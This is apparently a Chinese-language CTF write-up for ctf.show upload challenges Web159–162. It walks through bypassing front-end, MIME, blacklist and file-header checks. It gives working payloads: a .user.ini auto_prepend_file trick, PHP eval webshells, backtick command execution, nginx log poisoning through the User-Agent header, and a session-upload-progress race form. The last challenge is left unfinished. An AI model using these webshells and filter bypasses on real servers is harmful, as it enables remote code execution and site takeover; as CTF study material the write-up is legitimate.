Web159
考点:
前端校验+MIME验证+黑名单
思路:
上传.user.ini文件:
文件内容auto_prepend_file=shell.png
由于网页存在前端过滤,只允许上传.png文件,所以我们将文件名修改为.user.ini.png上传,然后抓包删除.png后缀名,就能成功上传了。
然后上传shell.png:
文件内容:<?php @eval($_POST['cmd']);?>
不出所料被过滤了。抓包测试一下过滤了哪些字符。
由于[]和{}都被过滤了,不能上传一句话木马,直接进行RCE。
又因为括号(也被过滤,所以选择用反引号执行系统命令。
<?=`ls ../`?>
<?=`tac ../fla*`?>
访问/upload目录,得到flag.
Web160
思路:
上传.user.ini文件:
上传shell.png文件:
文件内容<?php @eval($_POST['cmd']);?>
上传失败,抓包测试过滤了什么:
过滤了{}和[],所以不能使用一句话木马。
过滤了()和反引号,不能直接进行RCE。
考虑使用日志注入,由于过滤了log,所以拼接绕过:
<?=include"/var/lo"."g/nginx/access.lo"."g"?>
修改UA为:<?php eval($_POST[1]);?>
POST传参:
1=system('ls ../');
1=system('tac ../fla*');
得到flag.
也可以蚁剑连接(要在修改后的UA头写入之后连接,不然日志文件中没有PHP代码)
得到flag.
Web161
思路:
上传.user.ini文件,显示文件上传不合规:
其实是添加了文件头校验:
检查上传的文件时,只检查文件的后缀是不够的,还需要检测文件头是否合法。每一种类型的文件都有不同的文件头。文件头的作用其实与后缀很像,都是用于提示文件类型,可以理解为文件的前缀。
所以我们在文件内容前添加 GIF89a ,也就是GIF文件的文件头来绕过检测:
.user.ini文件内容:
GIF89a
auto_prepend_file=shell.png
上传成功!
上传shell.png文件:
GIF89a
<?=include"/var/lo"."g/nginx/access.lo"."g"?>
上传成功!
修改UA为:<?php eval($_POST[1]);?>
POST传参:
1=system('ls ../');
1=system('tac ../fla*');
得到flag.
Web162
思路:
上传.user.ini文件,上传失败,进行fuzz测试:
过滤了相当多的字符
[]和{}被过滤,不能直接传一句话木马。
() " ' .
都被过滤,不能进行RCE。
这里看到点.
被过滤了,所以我们不能正常上传文件与进行日志包含。
选择session条件竞争的做法。
GIF89a
auto_prepend_file=/tmp/sess_shell //上传shell.png文件时记得将后缀名去掉
上传成功!(注:fuzz测试显示下划线_和/也被过滤,但是不知道为什么对上传没有影响)
准备一个上传数据包的网页:
<!DOCTYPE html>
<html>
<body>
<form action="http://67371c84-3fd6-4832-9fa5-fd0dcaedcd64.challenge.ctf.show/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('tac ../f*')?>") />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
后续操作暂时没有进行成功,先将思路贴在这里: